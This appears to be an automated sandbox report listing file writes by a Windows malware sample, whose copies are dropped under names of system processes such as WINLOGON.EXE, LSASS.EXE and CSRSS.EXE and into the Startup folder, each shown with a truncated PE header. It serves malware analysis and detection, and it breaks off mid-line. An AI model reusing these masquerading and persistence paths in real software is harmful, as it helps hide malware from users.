4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46811 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46739 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46891 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46851 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46970 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46865 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46707 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46925 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46995 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46890 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46946 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46850 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46903 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46977 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46898 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46783 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46919 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46852 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46842 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46802 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46739 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46826 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46811 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46907 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46895 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46935 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46806 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46854 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47003 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46724 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46837 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46935 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46823 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46827 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46813 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46922 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46769 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46746 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46935 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46917 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46899 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46760 bytes starting with PE header signature to file 